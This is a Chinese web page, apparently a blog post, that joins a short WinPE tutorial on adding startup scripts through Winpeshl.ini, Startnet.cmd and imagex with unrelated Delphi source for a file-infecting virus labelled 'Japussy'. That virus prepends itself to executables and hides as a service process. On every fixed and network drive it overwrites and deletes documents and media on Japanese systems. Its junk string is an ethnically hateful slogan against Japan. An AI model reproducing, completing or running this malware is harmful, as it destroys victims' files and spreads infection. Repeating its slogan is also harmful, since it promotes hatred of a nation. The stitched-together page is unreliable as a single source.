如何为WinPE添加DIY脚本将自定义脚本添加到PE系统中

如何为WinPE添加DIY脚本将自定义脚本添加到PE系统中,第1张

什么是脚本?脚本就是利用特定的描述性语言,根据一定格式编写的可执行文件。在WinPE系统下,用户要想让系统执行特定的程序功能,就可以将自己的自定义脚本添加到WinPE系统中。但是该怎么将DIY脚本添加进去呢,正成了很多用户大伤头脑的问题。

PE系统提供了三种方法启动自定义脚本:Winpeshl.ini、Startnet.cmd 和

Unattend.xml。原生态WinPE系统的默认界面是“命令提示符”窗口,但可以创建自定义的Winpeshl.ini文件,以便运行自己的外壳应用程序。也可以创建自己的

Startnet.cmd批处理文件来运行特定的命令集、批处理文件或脚本。Unattend.xml是WinPE

2.0的新应答文件格式,它取代了Winbom.ini和Winpeoem.sif。

一、使用Winpeshl.ini添加自定义脚本:

可以使用Winpeshl.ini的文件来启动自定义的外壳应用程序。Winpeshl.exe将在启动期间处理Winpeshl.ini中的设置。使用文本编辑器(如记事本)创建具有以下文件目录结构的Winpeshl.ini文本文件。例如:

[LaunchApp]

AppPath = %SYSTEMDRIVE%\myshell.exe

[LaunchApps]

%SYSTEMDRIVE%\mydir\application1.exe, -option1

-option2

application2.exe, -option1 -option2

注:将AppPath项设置为外壳应用程序的路径。此路径可以是绝对路径,也可以使用环境变量(相对路径),例如%SYSTEMROOT%\System32\Myshell.exe。AppPath

项不支持命令行选项。将此文件保存到WinPE系统映像的%SYSTEMROOT%\System32下。

二、使用Startnet.cmd添加自定义脚本:

使用Startnet.cmd可以在WinPE系统中添加自定义的命令行脚本。默认情况下,WinPE系统包括Startnet.cmd脚本,此脚本位于WinPE系统映像的

%SYSTEMROOT%\System32 中。当前,主要用Startnet.cmd来启动Wpeinit.exe。用于安装即插即用 (PnP) 设备、处理

Unattend.xml 设置以及加载网络资源。编辑Startnet.cmd 以包括自定义命令。

注意:对于PnP和网络支持,请确保在自定义Startnet.cmd脚本中包含了对wpeinit的调用。

三、使用Unattend.xml添加自定义脚本:

运行imagex /info

d:\boot.wim,查看WinPE系统映像的信息。我们要注意这一行:

Image Count: 2

说明此WinPE系统映像文件中其实包含了两个映像。每个映像的详细信息在后面有详细的说明。这里要特别说明的是我们需要编辑的是第二个名称为WDS的映像,因为WDS使用此映像来引导计算机。

使用imagex命令加参数mountrw将 *.wim 加载到pemount目录中:

imagex /mountrw

c:\winpe2\pe2.wim 2 c:\pemount

使用peimg命令将第三方驱动添加到WinPE

2.0系统中,如需添加多个设备驱动请重复该步骤。

peimg /inf=c:\winpe2\netdrv\xxx.inf

c:\pemount\windows

使用imagex命令加参数unmount及commit将修改写入到 *.wim 中。

imagex /unmount c:\pemount /commit

在WinPE系统下,提供了三种启动自定义脚本的方法,用户就可以利用这三个途径来将自定义脚本添加到WinPE中,看着很复杂,其实 *** 作起来很简单的,有需要的用户赶紧学习起来吧。

熊猫烧香 - 核心源码

--------------------------------------------------------------------------------

代码:--------------------------------------------------------------------------------

程序代码

program Japussy

uses

Windows, SysUtils, Classes, Graphics, ShellAPI{, Registry}

const

HeaderSize = 82432 //病毒体的大小

IconOffset = $12EB8//PE文件主图标的偏移量

//在我的Delphi5 SP1上面编译得到的大小,其它版本的Delphi可能不同

//查找2800000020的十六进制字符串可以找到主图标的偏移量

{

HeaderSize = 38912 //Upx压缩过病毒体的大小

IconOffset = $92BC //Upx压缩过PE文件主图标的偏移量

//Upx 1.24W 用法: upx -9 --8086 Japussy.exe

}

IconSize = $2E8 //PE文件主图标的大小--744字节

IconTail = IconOffset + IconSize //PE文件主图标的尾部

ID = $44444444 //感染标记

//垃圾码,以备写入

Catchword = 'If a race need to be killed out, it must be Yamato. ' +

'If a country need to be destroyed, it must be Japan! ' +

'*** W32.Japussy.Worm.A ***'

{$R *.RES}

function RegisterServiceProcess(dwProcessID, dwType: Integer): Integer

stdcallexternal 'Kernel32.dll'//函数声明

var

TmpFile: string

Si: STARTUPINFO

Pi: PROCESS_INFORMATION

IsJap: Boolean = False//日文 *** 作系统标记

{ 判断是否为Win9x }

function IsWin9x: Boolean

var

Ver: TOSVersionInfo

begin

Result := False

Ver.dwOSVersionInfoSize := SizeOf(TOSVersionInfo)

if not GetVersionEx(Ver) then

Exit

if (Ver.dwPlatformID = VER_PLATFORM_WIN32_WINDOWS) then //Win9x

Result := True

end

{ 在流之间复制 }

procedure CopyStream(Src: TStreamsStartPos: IntegerDst: TStream

dStartPos: IntegerCount: Integer)

var

sCurPos, dCurPos: Integer

begin

sCurPos := Src.Position

dCurPos := Dst.Position

Src.Seek(sStartPos, 0)

Dst.Seek(dStartPos, 0)

Dst.CopyFrom(Src, Count)

Src.Seek(sCurPos, 0)

Dst.Seek(dCurPos, 0)

end

{ 将宿主文件从已感染的PE文件中分离出来,以备使用 }

procedure ExtractFile(FileName: string)

var

sStream, dStream: TFileStream

begin

try

sStream := TFileStream.Create(ParamStr(0), fmOpenRead or fmShareDenyNone)

try

dStream := TFileStream.Create(FileName, fmCreate)

try

sStream.Seek(HeaderSize, 0)//跳过头部的病毒部分

dStream.CopyFrom(sStream, sStream.Size - HeaderSize)

finally

dStream.Free

end

finally

sStream.Free

end

except

end

end

{ 填充STARTUPINFO结构 }

procedure FillStartupInfo(var Si: STARTUPINFOState: Word)

begin

Si.cb := SizeOf(Si)

Si.lpReserved := nil

Si.lpDesktop := nil

Si.lpTitle := nil

Si.dwFlags := STARTF_USESHOWWINDOW

Si.wShowWindow := State

Si.cbReserved2 := 0

Si.lpReserved2 := nil

end

{ 发带毒邮件 }

procedure SendMail

begin

//哪位仁兄愿意完成之?

end

{ 感染PE文件 }

procedure InfectOneFile(FileName: string)

var

HdrStream, SrcStream: TFileStream

IcoStream, DstStream: TMemoryStream

iID: LongInt

aIcon: TIcon

Infected, IsPE: Boolean

i: Integer

Buf: array[0..1] of Char

begin

try //出错则文件正在被使用,退出

if CompareText(FileName, 'JAPUSSY.EXE') = 0 then //是自己则不感染

Exit

Infected := False

IsPE := False

SrcStream := TFileStream.Create(FileName, fmOpenRead)

try

for i := 0 to $108 do //检查PE文件头

begin

SrcStream.Seek(i, soFromBeginning)

SrcStream.Read(Buf, 2)

if (Buf[0] = #80) and (Buf[1] = #69) then //PE标记

begin

IsPE := True//是PE文件

Break

end

end

SrcStream.Seek(-4, soFromEnd)//检查感染标记

SrcStream.Read(iID, 4)

if (iID = ID) or (SrcStream.Size <10240) then //太小的文件不感染

Infected := True

finally

SrcStream.Free

end

if Infected or (not IsPE) then //如果感染过了或不是PE文件则退出

Exit

IcoStream := TMemoryStream.Create

DstStream := TMemoryStream.Create

try

aIcon := TIcon.Create

try

//得到被感染文件的主图标(744字节),存入流

aIcon.ReleaseHandle

aIcon.Handle := ExtractIcon(HInstance, PChar(FileName), 0)

aIcon.SaveToStream(IcoStream)

finally

aIcon.Free

end

SrcStream := TFileStream.Create(FileName, fmOpenRead)

//头文件

HdrStream := TFileStream.Create(ParamStr(0), fmOpenRead or fmShareDenyNone)

try

//写入病毒体主图标之前的数据

CopyStream(HdrStream, 0, DstStream, 0, IconOffset)

//写入目前程序的主图标

CopyStream(IcoStream, 22, DstStream, IconOffset, IconSize)

//写入病毒体主图标到病毒体尾部之间的数据

CopyStream(HdrStream, IconTail, DstStream, IconTail, HeaderSize - IconTail)

//写入宿主程序

CopyStream(SrcStream, 0, DstStream, HeaderSize, SrcStream.Size)

//写入已感染的标记

DstStream.Seek(0, 2)

iID := $44444444

DstStream.Write(iID, 4)

finally

HdrStream.Free

end

finally

SrcStream.Free

IcoStream.Free

DstStream.SaveToFile(FileName)//替换宿主文件

DstStream.Free

end

except

end

end

{ 将目标文件写入垃圾码后删除 }

procedure SmashFile(FileName: string)

var

FileHandle: Integer

i, Size, Mass, Max, Len: Integer

begin

try

SetFileAttributes(PChar(FileName), 0)//去掉只读属性

FileHandle := FileOpen(FileName, fmOpenWrite)//打开文件

try

Size := GetFileSize(FileHandle, nil)//文件大小

i := 0

Randomize

Max := Random(15)//写入垃圾码的随机次数

if Max <5 then

Max := 5

Mass := Size div Max//每个间隔块的大小

Len := Length(Catchword)

while i <Max do

begin

FileSeek(FileHandle, i * Mass, 0)//定位

//写入垃圾码,将文件彻底破坏掉

FileWrite(FileHandle, Catchword, Len)

Inc(i)

end

finally

FileClose(FileHandle)//关闭文件

end

DeleteFile(PChar(FileName))//删除之

except

end

end

{ 获得可写的驱动器列表 }

function GetDrives: string

var

DiskType: Word

D: Char

Str: string

i: Integer

begin

for i := 0 to 25 do //遍历26个字母

begin

D := Chr(i + 65)

Str := D + ':'

DiskType := GetDriveType(PChar(Str))

//得到本地磁盘和网络盘

if (DiskType = DRIVE_FIXED) or (DiskType = DRIVE_REMOTE) then

Result := Result + D

end

end

{ 遍历目录,感染和摧毁文件 }

procedure LoopFiles(Path, Mask: string)

var

i, Count: Integer

Fn, Ext: string

SubDir: TStrings

SearchRec: TSearchRec

Msg: TMsg

function IsValidDir(SearchRec: TSearchRec): Integer

begin

if (SearchRec.Attr <>16) and (SearchRec.Name <>'.') and

(SearchRec.Name <>'..') then

Result := 0 //不是目录

else if (SearchRec.Attr = 16) and (SearchRec.Name <>'.') and

(SearchRec.Name <>'..') then

Result := 1 //不是根目录

else Result := 2//是根目录

end

begin

if (FindFirst(Path + Mask, faAnyFile, SearchRec) = 0) then

begin

repeat

PeekMessage(Msg, 0, 0, 0, PM_REMOVE)//调整消息队列,避免引起怀疑

if IsValidDir(SearchRec) = 0 then

begin

Fn := Path + SearchRec.Name

Ext := UpperCase(ExtractFileExt(Fn))

if (Ext = '.EXE') or (Ext = '.SCR') then

begin

InfectOneFile(Fn)//感染可执行文件

end

else if (Ext = '.HTM') or (Ext = '.HTML') or (Ext = '.ASP') then

begin

//感染HTML和ASP文件,将Base64编码后的病毒写入

//感染浏览此网页的所有用户

//哪位大兄弟愿意完成之?

end

else if Ext = '.WAB' then //Outlook地址簿文件

begin

//获取Outlook邮件地址

end

else if Ext = '.ADC' then //Foxmail地址自动完成文件

begin

//获取Foxmail邮件地址

end

else if Ext = 'IND' then //Foxmail地址簿文件

begin

//获取Foxmail邮件地址

end

else

begin

if IsJap then //是倭文 *** 作系统

begin

if (Ext = '.DOC') or (Ext = '.XLS') or (Ext = '.MDB') or

(Ext = '.MP3') or (Ext = '.RM') or (Ext = '.RA') or

(Ext = '.WMA') or (Ext = '.ZIP') or (Ext = '.RAR') or

(Ext = '.MPEG') or (Ext = '.ASF') or (Ext = '.JPG') or

(Ext = '.JPEG') or (Ext = '.GIF') or (Ext = '.SWF') or

(Ext = '.PDF') or (Ext = '.CHM') or (Ext = '.AVI') then

SmashFile(Fn)//摧毁文件

end

end

end

//感染或删除一个文件后睡眠200毫秒,避免CPU占用率过高引起怀疑

Sleep(200)

until (FindNext(SearchRec) <>0)

end

FindClose(SearchRec)

SubDir := TStringList.Create

if (FindFirst(Path + '*.*', faDirectory, SearchRec) = 0) then

begin

repeat

if IsValidDir(SearchRec) = 1 then

SubDir.Add(SearchRec.Name)

until (FindNext(SearchRec) <>0)

end

FindClose(SearchRec)

Count := SubDir.Count - 1

for i := 0 to Count do

LoopFiles(Path + SubDir.Strings[i] + '', Mask)

FreeAndNil(SubDir)

end

{ 遍历磁盘上所有的文件 }

procedure InfectFiles

var

DriverList: string

i, Len: Integer

begin

if GetACP = 932 then //日文 *** 作系统

IsJap := True//去死吧!

DriverList := GetDrives//得到可写的磁盘列表

Len := Length(DriverList)

while True do //死循环

begin

for i := Len downto 1 do //遍历每个磁盘驱动器

LoopFiles(DriverList[i] + ':', '*.*')//感染之

SendMail//发带毒邮件

Sleep(1000 * 60 * 5)//睡眠5分钟

end

end

{ 主程序开始 }

begin

if IsWin9x then //是Win9x

RegisterServiceProcess(GetCurrentProcessID, 1) //注册为服务进程

else //WinNT

begin

//远程线程映射到Explorer进程

//哪位兄台愿意完成之?

end

//如果是原始病毒体自己

if CompareText(ExtractFileName(ParamStr(0)), 'Japussy.exe') = 0 then

InfectFiles //感染和发邮件

else //已寄生于宿主程序上了,开始工作

begin

TmpFile := ParamStr(0)//创建临时文件

Delete(TmpFile, Length(TmpFile) - 4, 4)

TmpFile := TmpFile + #32 + '.exe'//真正的宿主文件,多一个空格

ExtractFile(TmpFile)//分离之

FillStartupInfo(Si, SW_SHOWDEFAULT)

CreateProcess(PChar(TmpFile), PChar(TmpFile), nil, nil, True,

0, nil, '.', Si, Pi)//创建新进程运行之

InfectFiles//感染和发邮件

end

end.


欢迎分享,转载请注明来源:内存溢出

原文地址: https://outofmemory.cn/bake/11944097.html

(0)
打赏 微信扫一扫 微信扫一扫 支付宝扫一扫 支付宝扫一扫
上一篇 2023-05-19
下一篇 2023-05-19

发表评论

登录后才能评论

评论列表(0条)

保存